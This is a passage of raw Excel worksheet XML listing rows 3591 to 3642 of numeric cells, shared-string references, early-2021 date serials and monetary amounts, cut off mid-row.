      <c r="G3591" s="1">
        <v>44216</v>
      </c>
      <c r="H3591">
        <v>400000</v>
      </c>
      <c r="I3591" t="s">
        <v>12876</v>
      </c>
      <c r="J3591" t="s">
        <v>12877</v>
      </c>
    </row>
    <row r="3592" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3592">
        <v>23782</v>
      </c>
      <c r="B3592">
        <v>5251</v>
      </c>
      <c r="C3592" t="s">
        <v>8342</v>
      </c>
      <c r="D3592" t="s">
        <v>12875</v>
      </c>
      <c r="E3592">
        <v>32</v>
      </c>
      <c r="F3592" t="s">
        <v>12878</v>
      </c>
      <c r="G3592" s="1">
        <v>44216</v>
      </c>
      <c r="H3592">
        <v>300000</v>
      </c>
      <c r="I3592" t="s">
        <v>9536</v>
      </c>
      <c r="J3592" t="s">
        <v>12877</v>
      </c>
    </row>
    <row r="3593" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3593">
        <v>23783</v>
      </c>
      <c r="B3593">
        <v>4911</v>
      </c>
      <c r="C3593" t="s">
        <v>7528</v>
      </c>
      <c r="D3593" t="s">
        <v>12879</v>
      </c>
      <c r="E3593">
        <v>17</v>
      </c>
      <c r="F3593" t="s">
        <v>12880</v>
      </c>
      <c r="G3593" s="1">
        <v>44253</v>
      </c>
      <c r="H3593">
        <v>1500000</v>
      </c>
      <c r="I3593" t="s">
        <v>12881</v>
      </c>
    </row>
    <row r="3594" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3594">
        <v>23784</v>
      </c>
      <c r="B3594">
        <v>4911</v>
      </c>
      <c r="C3594" t="s">
        <v>7528</v>
      </c>
      <c r="D3594" t="s">
        <v>12879</v>
      </c>
      <c r="E3594">
        <v>17</v>
      </c>
      <c r="F3594" t="s">
        <v>2236</v>
      </c>
      <c r="G3594" s="1">
        <v>44253</v>
      </c>
      <c r="H3594">
        <v>1000000</v>
      </c>
      <c r="I3594" t="s">
        <v>12881</v>
      </c>
    </row>
    <row r="3595" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3595">
        <v>23786</v>
      </c>
      <c r="B3595">
        <v>1418</v>
      </c>
      <c r="C3595" t="s">
        <v>4067</v>
      </c>
      <c r="D3595" t="s">
        <v>12882</v>
      </c>
      <c r="E3595">
        <v>16</v>
      </c>
      <c r="F3595" t="s">
        <v>4069</v>
      </c>
      <c r="G3595" s="1">
        <v>44223</v>
      </c>
      <c r="H3595">
        <v>192000</v>
      </c>
      <c r="J3595" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3596" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3596">
        <v>23787</v>
      </c>
      <c r="B3596">
        <v>253</v>
      </c>
      <c r="C3596" t="s">
        <v>2234</v>
      </c>
      <c r="D3596" t="s">
        <v>12883</v>
      </c>
      <c r="E3596">
        <v>12</v>
      </c>
      <c r="F3596" t="s">
        <v>2236</v>
      </c>
      <c r="G3596" s="1">
        <v>44264</v>
      </c>
      <c r="H3596">
        <v>3000000</v>
      </c>
      <c r="I3596" t="s">
        <v>9536</v>
      </c>
      <c r="J3596" t="s">
        <v>11181</v>
      </c>
    </row>
    <row r="3597" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3597">
        <v>23789</v>
      </c>
      <c r="B3597">
        <v>1465</v>
      </c>
      <c r="C3597" t="s">
        <v>4155</v>
      </c>
      <c r="D3597" t="s">
        <v>12884</v>
      </c>
      <c r="E3597">
        <v>13</v>
      </c>
      <c r="F3597" t="s">
        <v>11565</v>
      </c>
      <c r="G3597" s="1">
        <v>44242</v>
      </c>
      <c r="H3597">
        <v>15000</v>
      </c>
      <c r="I3597" t="s">
        <v>11131</v>
      </c>
      <c r="J3597" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3598" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3598">
        <v>23790</v>
      </c>
      <c r="B3598">
        <v>1465</v>
      </c>
      <c r="C3598" t="s">
        <v>4155</v>
      </c>
      <c r="D3598" t="s">
        <v>12884</v>
      </c>
      <c r="E3598">
        <v>13</v>
      </c>
      <c r="F3598" t="s">
        <v>12885</v>
      </c>
      <c r="G3598" s="1">
        <v>44242</v>
      </c>
      <c r="H3598">
        <v>28000</v>
      </c>
      <c r="I3598" t="s">
        <v>12886</v>
      </c>
    </row>
    <row r="3599" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3599">
        <v>23791</v>
      </c>
      <c r="B3599">
        <v>2676</v>
      </c>
      <c r="C3599" t="s">
        <v>5653</v>
      </c>
      <c r="D3599" t="s">
        <v>10521</v>
      </c>
      <c r="E3599">
        <v>17</v>
      </c>
      <c r="F3599" t="s">
        <v>12887</v>
      </c>
      <c r="G3599" s="1">
        <v>44232</v>
      </c>
      <c r="H3599">
        <v>1000</v>
      </c>
      <c r="J3599" t="s">
        <v>12888</v>
      </c>
    </row>
    <row r="3600" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3600">
        <v>23794</v>
      </c>
      <c r="B3600">
        <v>5238</v>
      </c>
      <c r="C3600" t="s">
        <v>16508</v>
      </c>
      <c r="D3600" t="s">
        <v>16509</v>
      </c>
      <c r="E3600">
        <v>26</v>
      </c>
      <c r="F3600" t="s">
        <v>12890</v>
      </c>
      <c r="G3600" s="1">
        <v>44251</v>
      </c>
      <c r="H3600" s="4">
        <v>10000</v>
      </c>
      <c r="I3600" t="s">
        <v>9522</v>
      </c>
      <c r="J3600" t="s">
        <v>12891</v>
      </c>
    </row>
    <row r="3601" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3601">
        <v>23795</v>
      </c>
      <c r="B3601">
        <v>5238</v>
      </c>
      <c r="C3601" t="s">
        <v>16508</v>
      </c>
      <c r="D3601" t="s">
        <v>16509</v>
      </c>
      <c r="E3601">
        <v>26</v>
      </c>
      <c r="F3601" t="s">
        <v>12892</v>
      </c>
      <c r="G3601" s="1">
        <v>44251</v>
      </c>
      <c r="H3601" s="4">
        <v>10000</v>
      </c>
      <c r="I3601" t="s">
        <v>9522</v>
      </c>
      <c r="J3601" t="s">
        <v>12891</v>
      </c>
    </row>
    <row r="3602" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3602">
        <v>23796</v>
      </c>
      <c r="B3602">
        <v>5238</v>
      </c>
      <c r="C3602" t="s">
        <v>16508</v>
      </c>
      <c r="D3602" t="s">
        <v>16509</v>
      </c>
      <c r="E3602">
        <v>26</v>
      </c>
      <c r="F3602" t="s">
        <v>3814</v>
      </c>
      <c r="G3602" s="1">
        <v>44251</v>
      </c>
      <c r="H3602" s="4">
        <v>10000</v>
      </c>
      <c r="I3602" t="s">
        <v>9522</v>
      </c>
      <c r="J3602" t="s">
        <v>12891</v>
      </c>
    </row>
    <row r="3603" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3603">
        <v>23798</v>
      </c>
      <c r="B3603">
        <v>1341</v>
      </c>
      <c r="C3603" t="s">
        <v>4132</v>
      </c>
      <c r="D3603" t="s">
        <v>12893</v>
      </c>
      <c r="E3603">
        <v>31</v>
      </c>
      <c r="F3603" t="s">
        <v>12894</v>
      </c>
      <c r="G3603" s="1">
        <v>44267</v>
      </c>
      <c r="H3603">
        <v>500</v>
      </c>
      <c r="I3603" t="s">
        <v>10010</v>
      </c>
      <c r="J3603" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3604" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3604">
        <v>23799</v>
      </c>
      <c r="B3604">
        <v>1341</v>
      </c>
      <c r="C3604" t="s">
        <v>4132</v>
      </c>
      <c r="D3604" t="s">
        <v>12893</v>
      </c>
      <c r="E3604">
        <v>31</v>
      </c>
      <c r="F3604" t="s">
        <v>3763</v>
      </c>
      <c r="G3604" s="1">
        <v>44267</v>
      </c>
      <c r="H3604">
        <v>500</v>
      </c>
      <c r="I3604" t="s">
        <v>10010</v>
      </c>
      <c r="J3604" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3605" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3605">
        <v>23800</v>
      </c>
      <c r="B3605">
        <v>1341</v>
      </c>
      <c r="C3605" t="s">
        <v>4132</v>
      </c>
      <c r="D3605" t="s">
        <v>12893</v>
      </c>
      <c r="E3605">
        <v>31</v>
      </c>
      <c r="F3605" t="s">
        <v>9586</v>
      </c>
      <c r="G3605" s="1">
        <v>44267</v>
      </c>
      <c r="H3605">
        <v>500</v>
      </c>
      <c r="I3605" t="s">
        <v>10010</v>
      </c>
      <c r="J3605" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3606" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3606">
        <v>23801</v>
      </c>
      <c r="B3606">
        <v>5237</v>
      </c>
      <c r="C3606" t="s">
        <v>8364</v>
      </c>
      <c r="D3606" t="s">
        <v>12895</v>
      </c>
      <c r="E3606">
        <v>32</v>
      </c>
      <c r="F3606" t="s">
        <v>4686</v>
      </c>
      <c r="G3606" s="1">
        <v>44216</v>
      </c>
      <c r="H3606">
        <v>93600</v>
      </c>
      <c r="I3606" t="s">
        <v>9746</v>
      </c>
      <c r="J3606" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3607" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3607">
        <v>23802</v>
      </c>
      <c r="B3607">
        <v>5255</v>
      </c>
      <c r="C3607" t="s">
        <v>8373</v>
      </c>
      <c r="D3607" t="s">
        <v>12896</v>
      </c>
      <c r="E3607">
        <v>26</v>
      </c>
      <c r="F3607" t="s">
        <v>364</v>
      </c>
      <c r="G3607" s="1">
        <v>44251</v>
      </c>
      <c r="H3607">
        <v>1000</v>
      </c>
      <c r="I3607" t="s">
        <v>12897</v>
      </c>
      <c r="J3607" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="3608" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3608">
        <v>23803</v>
      </c>
      <c r="B3608">
        <v>5237</v>
      </c>
      <c r="C3608" t="s">
        <v>8364</v>
      </c>
      <c r="D3608" t="s">
        <v>12895</v>
      </c>
      <c r="E3608">
        <v>32</v>
      </c>
      <c r="F3608" t="s">
        <v>2236</v>
      </c>
      <c r="G3608" s="1">
        <v>44216</v>
      </c>
      <c r="H3608">
        <v>93600</v>
      </c>
      <c r="I3608" t="s">
        <v>9746</v>
      </c>
      <c r="J3608" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3609" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3609">
        <v>23804</v>
      </c>
      <c r="B3609">
        <v>5237</v>
      </c>
      <c r="C3609" t="s">
        <v>8364</v>
      </c>
      <c r="D3609" t="s">
        <v>12895</v>
      </c>
      <c r="E3609">
        <v>32</v>
      </c>
      <c r="F3609" t="s">
        <v>12898</v>
      </c>
      <c r="G3609" s="1">
        <v>44216</v>
      </c>
      <c r="H3609">
        <v>93600</v>
      </c>
      <c r="I3609" t="s">
        <v>9965</v>
      </c>
      <c r="J3609" t="s">
        <v>12899</v>
      </c>
    </row>
    <row r="3610" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3610">
        <v>23805</v>
      </c>
      <c r="B3610">
        <v>5237</v>
      </c>
      <c r="C3610" t="s">
        <v>8364</v>
      </c>
      <c r="D3610" t="s">
        <v>12895</v>
      </c>
      <c r="E3610">
        <v>32</v>
      </c>
      <c r="F3610" t="s">
        <v>12900</v>
      </c>
      <c r="G3610" s="1">
        <v>44216</v>
      </c>
      <c r="H3610">
        <v>93600</v>
      </c>
      <c r="I3610" t="s">
        <v>12901</v>
      </c>
      <c r="J3610" t="s">
        <v>12899</v>
      </c>
    </row>
    <row r="3611" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3611">
        <v>23806</v>
      </c>
      <c r="B3611">
        <v>976</v>
      </c>
      <c r="C3611" t="s">
        <v>4165</v>
      </c>
      <c r="D3611" t="s">
        <v>12902</v>
      </c>
      <c r="E3611">
        <v>29</v>
      </c>
      <c r="F3611" t="s">
        <v>12903</v>
      </c>
      <c r="G3611" s="1">
        <v>44224</v>
      </c>
      <c r="H3611">
        <v>200000</v>
      </c>
      <c r="I3611" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3612" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3612">
        <v>23807</v>
      </c>
      <c r="B3612">
        <v>4832</v>
      </c>
      <c r="C3612" t="s">
        <v>6157</v>
      </c>
      <c r="D3612" t="s">
        <v>11960</v>
      </c>
      <c r="E3612">
        <v>26</v>
      </c>
      <c r="F3612" t="s">
        <v>9681</v>
      </c>
      <c r="G3612" s="1">
        <v>44253</v>
      </c>
      <c r="H3612">
        <v>150</v>
      </c>
      <c r="J3612" t="s">
        <v>12904</v>
      </c>
    </row>
    <row r="3613" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3613">
        <v>23808</v>
      </c>
      <c r="B3613">
        <v>4832</v>
      </c>
      <c r="C3613" t="s">
        <v>6157</v>
      </c>
      <c r="D3613" t="s">
        <v>11960</v>
      </c>
      <c r="E3613">
        <v>26</v>
      </c>
      <c r="F3613" t="s">
        <v>9533</v>
      </c>
      <c r="G3613" s="1">
        <v>44253</v>
      </c>
      <c r="H3613">
        <v>150</v>
      </c>
      <c r="J3613" t="s">
        <v>12904</v>
      </c>
    </row>
    <row r="3614" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3614">
        <v>23809</v>
      </c>
      <c r="B3614">
        <v>1956</v>
      </c>
      <c r="C3614" t="s">
        <v>6408</v>
      </c>
      <c r="D3614" t="s">
        <v>12905</v>
      </c>
      <c r="E3614">
        <v>26</v>
      </c>
      <c r="F3614" t="s">
        <v>9437</v>
      </c>
      <c r="G3614" s="1">
        <v>44274</v>
      </c>
      <c r="H3614">
        <v>60000</v>
      </c>
      <c r="J3614" t="s">
        <v>12906</v>
      </c>
    </row>
    <row r="3615" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3615">
        <v>23810</v>
      </c>
      <c r="B3615">
        <v>1956</v>
      </c>
      <c r="C3615" t="s">
        <v>6408</v>
      </c>
      <c r="D3615" t="s">
        <v>12905</v>
      </c>
      <c r="E3615">
        <v>26</v>
      </c>
      <c r="F3615" t="s">
        <v>12907</v>
      </c>
      <c r="G3615" s="1">
        <v>44274</v>
      </c>
      <c r="H3615">
        <v>40000</v>
      </c>
      <c r="J3615" t="s">
        <v>9889</v>
      </c>
    </row>
    <row r="3616" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3616">
        <v>23811</v>
      </c>
      <c r="B3616">
        <v>1956</v>
      </c>
      <c r="C3616" t="s">
        <v>6408</v>
      </c>
      <c r="D3616" t="s">
        <v>12905</v>
      </c>
      <c r="E3616">
        <v>26</v>
      </c>
      <c r="F3616" t="s">
        <v>12908</v>
      </c>
      <c r="G3616" s="1">
        <v>44274</v>
      </c>
      <c r="H3616">
        <v>40000</v>
      </c>
      <c r="J3616" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3617" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3617">
        <v>23812</v>
      </c>
      <c r="B3617">
        <v>1956</v>
      </c>
      <c r="C3617" t="s">
        <v>6408</v>
      </c>
      <c r="D3617" t="s">
        <v>12905</v>
      </c>
      <c r="E3617">
        <v>26</v>
      </c>
      <c r="F3617" t="s">
        <v>609</v>
      </c>
      <c r="G3617" s="1">
        <v>44274</v>
      </c>
      <c r="H3617">
        <v>12000</v>
      </c>
      <c r="J3617" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3618" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3618">
        <v>23814</v>
      </c>
      <c r="B3618">
        <v>5234</v>
      </c>
      <c r="C3618" t="s">
        <v>8380</v>
      </c>
      <c r="D3618" t="s">
        <v>12909</v>
      </c>
      <c r="E3618">
        <v>9</v>
      </c>
      <c r="F3618" t="s">
        <v>12910</v>
      </c>
      <c r="G3618" s="1">
        <v>44237</v>
      </c>
      <c r="H3618">
        <v>325000</v>
      </c>
      <c r="I3618" t="s">
        <v>12911</v>
      </c>
    </row>
    <row r="3619" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3619">
        <v>23823</v>
      </c>
      <c r="B3619">
        <v>5203</v>
      </c>
      <c r="C3619" t="s">
        <v>8248</v>
      </c>
      <c r="D3619" t="s">
        <v>12912</v>
      </c>
      <c r="E3619">
        <v>10</v>
      </c>
      <c r="F3619" t="s">
        <v>12913</v>
      </c>
      <c r="G3619" s="1">
        <v>44225</v>
      </c>
      <c r="H3619">
        <v>3240</v>
      </c>
      <c r="I3619" t="s">
        <v>12808</v>
      </c>
    </row>
    <row r="3620" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3620">
        <v>23824</v>
      </c>
      <c r="B3620">
        <v>5203</v>
      </c>
      <c r="C3620" t="s">
        <v>8248</v>
      </c>
      <c r="D3620" t="s">
        <v>12912</v>
      </c>
      <c r="E3620">
        <v>10</v>
      </c>
      <c r="F3620" t="s">
        <v>9792</v>
      </c>
      <c r="G3620" s="1">
        <v>44225</v>
      </c>
      <c r="H3620">
        <v>720</v>
      </c>
      <c r="I3620" t="s">
        <v>12808</v>
      </c>
    </row>
    <row r="3621" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3621">
        <v>23828</v>
      </c>
      <c r="B3621">
        <v>5244</v>
      </c>
      <c r="C3621" t="s">
        <v>8349</v>
      </c>
      <c r="D3621" t="s">
        <v>12914</v>
      </c>
      <c r="E3621">
        <v>25</v>
      </c>
      <c r="F3621" t="s">
        <v>2236</v>
      </c>
      <c r="G3621" s="1">
        <v>44238</v>
      </c>
      <c r="H3621">
        <v>180000</v>
      </c>
      <c r="I3621" t="s">
        <v>12915</v>
      </c>
      <c r="J3621" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="3622" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3622">
        <v>23829</v>
      </c>
      <c r="B3622">
        <v>5244</v>
      </c>
      <c r="C3622" t="s">
        <v>8349</v>
      </c>
      <c r="D3622" t="s">
        <v>12914</v>
      </c>
      <c r="E3622">
        <v>25</v>
      </c>
      <c r="F3622" t="s">
        <v>4686</v>
      </c>
      <c r="G3622" s="1">
        <v>44238</v>
      </c>
      <c r="H3622">
        <v>50000</v>
      </c>
      <c r="I3622" t="s">
        <v>12915</v>
      </c>
      <c r="J3622" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="3623" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3623">
        <v>23830</v>
      </c>
      <c r="B3623">
        <v>5270</v>
      </c>
      <c r="C3623" t="s">
        <v>3535</v>
      </c>
      <c r="D3623" t="s">
        <v>12916</v>
      </c>
      <c r="E3623">
        <v>16</v>
      </c>
      <c r="F3623" t="s">
        <v>673</v>
      </c>
      <c r="G3623" s="1">
        <v>44232</v>
      </c>
      <c r="H3623">
        <v>2200000</v>
      </c>
      <c r="I3623" t="s">
        <v>9536</v>
      </c>
      <c r="J3623" t="s">
        <v>12917</v>
      </c>
    </row>
    <row r="3624" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3624">
        <v>23831</v>
      </c>
      <c r="B3624">
        <v>5270</v>
      </c>
      <c r="C3624" t="s">
        <v>3535</v>
      </c>
      <c r="D3624" t="s">
        <v>12916</v>
      </c>
      <c r="E3624">
        <v>16</v>
      </c>
      <c r="F3624" t="s">
        <v>9441</v>
      </c>
      <c r="G3624" s="1">
        <v>44232</v>
      </c>
      <c r="H3624">
        <v>1800</v>
      </c>
      <c r="J3624" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3625" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3625">
        <v>23832</v>
      </c>
      <c r="B3625">
        <v>4901</v>
      </c>
      <c r="C3625" t="s">
        <v>7546</v>
      </c>
      <c r="D3625" t="s">
        <v>12918</v>
      </c>
      <c r="E3625">
        <v>2</v>
      </c>
      <c r="F3625" t="s">
        <v>12024</v>
      </c>
      <c r="G3625" s="1">
        <v>44236</v>
      </c>
      <c r="H3625">
        <v>180000</v>
      </c>
      <c r="I3625" t="s">
        <v>12919</v>
      </c>
      <c r="J3625" t="s">
        <v>12920</v>
      </c>
    </row>
    <row r="3626" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3626">
        <v>23833</v>
      </c>
      <c r="B3626">
        <v>4901</v>
      </c>
      <c r="C3626" t="s">
        <v>16510</v>
      </c>
      <c r="D3626" t="s">
        <v>16511</v>
      </c>
      <c r="E3626">
        <v>2</v>
      </c>
      <c r="F3626" t="s">
        <v>12921</v>
      </c>
      <c r="G3626" s="1">
        <v>44236</v>
      </c>
      <c r="H3626" s="4">
        <v>360000</v>
      </c>
      <c r="I3626" t="s">
        <v>12922</v>
      </c>
      <c r="J3626" t="s">
        <v>12920</v>
      </c>
    </row>
    <row r="3627" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3627">
        <v>23834</v>
      </c>
      <c r="B3627">
        <v>1515</v>
      </c>
      <c r="C3627" t="s">
        <v>4098</v>
      </c>
      <c r="D3627" t="s">
        <v>12923</v>
      </c>
      <c r="E3627">
        <v>12</v>
      </c>
      <c r="F3627" t="s">
        <v>12924</v>
      </c>
      <c r="G3627" s="1">
        <v>44258</v>
      </c>
      <c r="H3627">
        <v>0</v>
      </c>
      <c r="I3627" t="s">
        <v>12925</v>
      </c>
    </row>
    <row r="3628" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3628">
        <v>23837</v>
      </c>
      <c r="B3628">
        <v>1515</v>
      </c>
      <c r="C3628" t="s">
        <v>4098</v>
      </c>
      <c r="D3628" t="s">
        <v>12923</v>
      </c>
      <c r="E3628">
        <v>12</v>
      </c>
      <c r="F3628" t="s">
        <v>9437</v>
      </c>
      <c r="G3628" s="1">
        <v>44258</v>
      </c>
      <c r="H3628">
        <v>0</v>
      </c>
      <c r="I3628" t="s">
        <v>12926</v>
      </c>
    </row>
    <row r="3629" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3629">
        <v>23840</v>
      </c>
      <c r="B3629">
        <v>1406</v>
      </c>
      <c r="C3629" t="s">
        <v>4172</v>
      </c>
      <c r="D3629" t="s">
        <v>12927</v>
      </c>
      <c r="E3629">
        <v>14</v>
      </c>
      <c r="F3629" t="s">
        <v>3673</v>
      </c>
      <c r="G3629" s="1">
        <v>44267</v>
      </c>
      <c r="H3629">
        <v>427200</v>
      </c>
      <c r="I3629" t="s">
        <v>10442</v>
      </c>
      <c r="J3629" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="3630" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3630">
        <v>23843</v>
      </c>
      <c r="B3630">
        <v>5261</v>
      </c>
      <c r="C3630" t="s">
        <v>8391</v>
      </c>
      <c r="D3630" t="s">
        <v>12928</v>
      </c>
      <c r="E3630">
        <v>13</v>
      </c>
      <c r="F3630" t="s">
        <v>9523</v>
      </c>
      <c r="G3630" s="1">
        <v>44259</v>
      </c>
      <c r="H3630">
        <v>100000</v>
      </c>
      <c r="I3630" t="s">
        <v>12929</v>
      </c>
      <c r="J3630" t="s">
        <v>11858</v>
      </c>
    </row>
    <row r="3631" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3631">
        <v>23844</v>
      </c>
      <c r="B3631">
        <v>5261</v>
      </c>
      <c r="C3631" t="s">
        <v>8391</v>
      </c>
      <c r="D3631" t="s">
        <v>12928</v>
      </c>
      <c r="E3631">
        <v>13</v>
      </c>
      <c r="F3631" t="s">
        <v>764</v>
      </c>
      <c r="G3631" s="1">
        <v>44259</v>
      </c>
      <c r="H3631">
        <v>100000</v>
      </c>
      <c r="I3631" t="s">
        <v>12930</v>
      </c>
      <c r="J3631" t="s">
        <v>11858</v>
      </c>
    </row>
    <row r="3632" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3632">
        <v>23845</v>
      </c>
      <c r="B3632">
        <v>5261</v>
      </c>
      <c r="C3632" t="s">
        <v>8391</v>
      </c>
      <c r="D3632" t="s">
        <v>12928</v>
      </c>
      <c r="E3632">
        <v>13</v>
      </c>
      <c r="F3632" t="s">
        <v>12931</v>
      </c>
      <c r="G3632" s="1">
        <v>44259</v>
      </c>
      <c r="H3632">
        <v>100000</v>
      </c>
      <c r="I3632" t="s">
        <v>12930</v>
      </c>
      <c r="J3632" t="s">
        <v>11858</v>
      </c>
    </row>
    <row r="3633" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3633">
        <v>23849</v>
      </c>
      <c r="B3633">
        <v>5205</v>
      </c>
      <c r="C3633" t="s">
        <v>6100</v>
      </c>
      <c r="D3633" t="s">
        <v>12932</v>
      </c>
      <c r="E3633">
        <v>16</v>
      </c>
      <c r="F3633" t="s">
        <v>364</v>
      </c>
      <c r="G3633" s="1">
        <v>44232</v>
      </c>
      <c r="H3633">
        <v>1000</v>
      </c>
      <c r="J3633" t="s">
        <v>12846</v>
      </c>
    </row>
    <row r="3634" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3634">
        <v>23850</v>
      </c>
      <c r="B3634">
        <v>1502</v>
      </c>
      <c r="C3634" t="s">
        <v>16512</v>
      </c>
      <c r="D3634" t="s">
        <v>16513</v>
      </c>
      <c r="E3634">
        <v>18</v>
      </c>
      <c r="F3634" t="s">
        <v>12933</v>
      </c>
      <c r="G3634" s="1">
        <v>44265</v>
      </c>
      <c r="H3634" s="4">
        <v>500000</v>
      </c>
      <c r="I3634" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3635" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3635">
        <v>23851</v>
      </c>
      <c r="B3635">
        <v>1502</v>
      </c>
      <c r="C3635" t="s">
        <v>16512</v>
      </c>
      <c r="D3635" t="s">
        <v>16513</v>
      </c>
      <c r="E3635">
        <v>18</v>
      </c>
      <c r="F3635" t="s">
        <v>12935</v>
      </c>
      <c r="G3635" s="1">
        <v>44265</v>
      </c>
      <c r="H3635" s="4">
        <v>500000</v>
      </c>
      <c r="I3635" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3636" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3636">
        <v>23852</v>
      </c>
      <c r="B3636">
        <v>1502</v>
      </c>
      <c r="C3636" t="s">
        <v>16512</v>
      </c>
      <c r="D3636" t="s">
        <v>16514</v>
      </c>
      <c r="E3636">
        <v>18</v>
      </c>
      <c r="F3636" t="s">
        <v>12936</v>
      </c>
      <c r="G3636" s="1">
        <v>44265</v>
      </c>
      <c r="H3636" s="4">
        <v>15000</v>
      </c>
      <c r="I3636" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3637" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3637">
        <v>23853</v>
      </c>
      <c r="B3637">
        <v>1502</v>
      </c>
      <c r="C3637" t="s">
        <v>16512</v>
      </c>
      <c r="D3637" t="s">
        <v>16513</v>
      </c>
      <c r="E3637">
        <v>18</v>
      </c>
      <c r="F3637" t="s">
        <v>12937</v>
      </c>
      <c r="G3637" s="1">
        <v>44265</v>
      </c>
      <c r="H3637" s="4">
        <v>15000</v>
      </c>
      <c r="I3637" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3638" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3638">
        <v>23854</v>
      </c>
      <c r="B3638">
        <v>1502</v>
      </c>
      <c r="C3638" t="s">
        <v>16512</v>
      </c>
      <c r="D3638" t="s">
        <v>16513</v>
      </c>
      <c r="E3638">
        <v>18</v>
      </c>
      <c r="F3638" t="s">
        <v>7241</v>
      </c>
      <c r="G3638" s="1">
        <v>44265</v>
      </c>
      <c r="H3638" s="4">
        <v>60000</v>
      </c>
      <c r="I3638" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3639" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3639">
        <v>23856</v>
      </c>
      <c r="B3639">
        <v>1502</v>
      </c>
      <c r="C3639" t="s">
        <v>16512</v>
      </c>
      <c r="D3639" t="s">
        <v>16513</v>
      </c>
      <c r="E3639">
        <v>18</v>
      </c>
      <c r="F3639" t="s">
        <v>9672</v>
      </c>
      <c r="G3639" s="1">
        <v>44265</v>
      </c>
      <c r="H3639" s="4">
        <v>60000</v>
      </c>
      <c r="I3639" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3640" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3640">
        <v>23857</v>
      </c>
      <c r="B3640">
        <v>1502</v>
      </c>
      <c r="C3640" t="s">
        <v>16512</v>
      </c>
      <c r="D3640" t="s">
        <v>16513</v>
      </c>
      <c r="E3640">
        <v>18</v>
      </c>
      <c r="F3640" t="s">
        <v>2236</v>
      </c>
      <c r="G3640" s="1">
        <v>44265</v>
      </c>
      <c r="H3640" s="4">
        <v>250000</v>
      </c>
      <c r="I3640" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3641" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3641">
        <v>23858</v>
      </c>
      <c r="B3641">
        <v>1502</v>
      </c>
      <c r="C3641" t="s">
        <v>16512</v>
      </c>
      <c r="D3641" t="s">
        <v>16513</v>
      </c>
      <c r="E3641">
        <v>18</v>
      </c>
      <c r="F3641" t="s">
        <v>4686</v>
      </c>
      <c r="G3641" s="1">
        <v>44265</v>
      </c>
      <c r="H3641" s="4">
        <v>250000</v>
      </c>
      <c r="I3641" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3642" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3642">
        <v>23859</v>
      </c>
      <c r="B3642">
        <v>1502</v>
      </c>
      <c r="C3642" t="s">
        <v>16512</v>
      </c>
      <c r="D3642" t="s">
        <v>16513</v>
      </c>
      <c r="E3642">
        <v>18</v>
      </c>
      <c r="F3642" t="s">
